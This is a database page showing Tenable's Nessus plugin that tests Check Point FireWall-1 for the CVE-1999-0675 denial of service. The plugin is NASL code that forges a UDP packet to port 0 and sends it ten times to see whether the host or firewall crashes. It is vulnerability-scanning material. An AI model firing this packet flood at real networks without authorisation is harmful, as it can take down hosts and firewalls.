Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 1999-2019 Tenable Network Security, Inc.FIREWALL1_DOS.NASL
HistoryAug 20, 1999 - 12:00 a.m.

Check Point FireWall-1 UDP Port 0 DoS

1999-08-2000:00:00
This script is Copyright (C) 1999-2019 Tenable Network Security, Inc.
www.tenable.com
32
JSON

It was possible to crash either the remote host or the firewall in between us and the remote host by sending an UDP packet going to port 0.

This flaw may allow an attacker to shut down your network.

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
 script_id(10074);
 script_version("1.31");
 script_cvs_date("Date: 2019/03/06 18:38:55");

 script_cve_id("CVE-1999-0675");
 script_bugtraq_id(576);

 script_name(english:"Check Point FireWall-1 UDP Port 0 DoS");
 script_summary(english:"Crashes the remote host by sending a UDP packet going to port 0");

 script_set_attribute(attribute:"synopsis", value:"The remote firewall has a denial of service vulnerability.");
 script_set_attribute(attribute:"description", value:
"It was possible to crash either the remote host or the firewall in
between us and the remote host by sending an UDP packet going to port
0.

This flaw may allow an attacker to shut down your network.");
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/1999/Aug/94");
 script_set_attribute(attribute:"solution", value:
"Contact your firewall vendor if it was the firewall which crashed, or
filter incoming UDP traffic if the remote host crashed.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"false");

 script_set_attribute(attribute:"vuln_publication_date", value:"1999/08/09");
 script_set_attribute(attribute:"plugin_publication_date", value:"1999/08/20");

 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_KILL_HOST);
 script_family(english:"Firewalls");

 script_copyright(english:"This script is Copyright (C) 1999-2019 Tenable Network Security, Inc.");

 script_require_keys("Settings/ParanoidReport");

 exit(0);
}

include("audit.inc");
include("global_settings.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

if ( TARGET_IS_IPV6 ) exit(0);
start_denial();


ip = forge_ip_packet(ip_v   : 4,
		     ip_hl  : 5,
		     ip_tos : 0,
		     ip_id  : 0x4321,
		     ip_len : 28,
		     ip_off : 0,
		     ip_p   : IPPROTO_UDP,
		     ip_src : compat::this_host(),
		     ip_ttl : 0x40);

# Forge the UDP packet

udp = forge_udp_packet( ip : ip,
			uh_sport : 1234, uh_dport : 0,
			uh_ulen : 8);


#
# Send this packet 10 times
#

send_packet(udp, pcap_active:FALSE) x 10;

#
# wait
#
sleep(5);

#
# And check...
#
alive = end_denial();
if(!alive){
                set_kb_item(name:"Host/dead", value:TRUE);
                security_hole(port:0, proto:"udp");
                }

Related

cve 1
checkpoint_advisories 1
cve
cve
CVE-1999-0675
1999-08-09 04:00:00
checkpoint_advisories
checkpoint_advisories
Packet Sanity (CVE-1999-0193; CVE-1999-0675; CVE-2000-0221; CVE-2002-1071; CVE-2003-1029; CVE-2004-0247; CVE-2004-1109; CVE-2007-1804; CVE-2007-3026; CVE-2008-7127; CVE-2010-1185; CVE-2011-0975; CVE-2012-6638; CVE-2014-3000)
2019-06-23 00:00:00
JSON
Related for FIREWALL1_DOS.NASL
cve1checkpoint_advisories1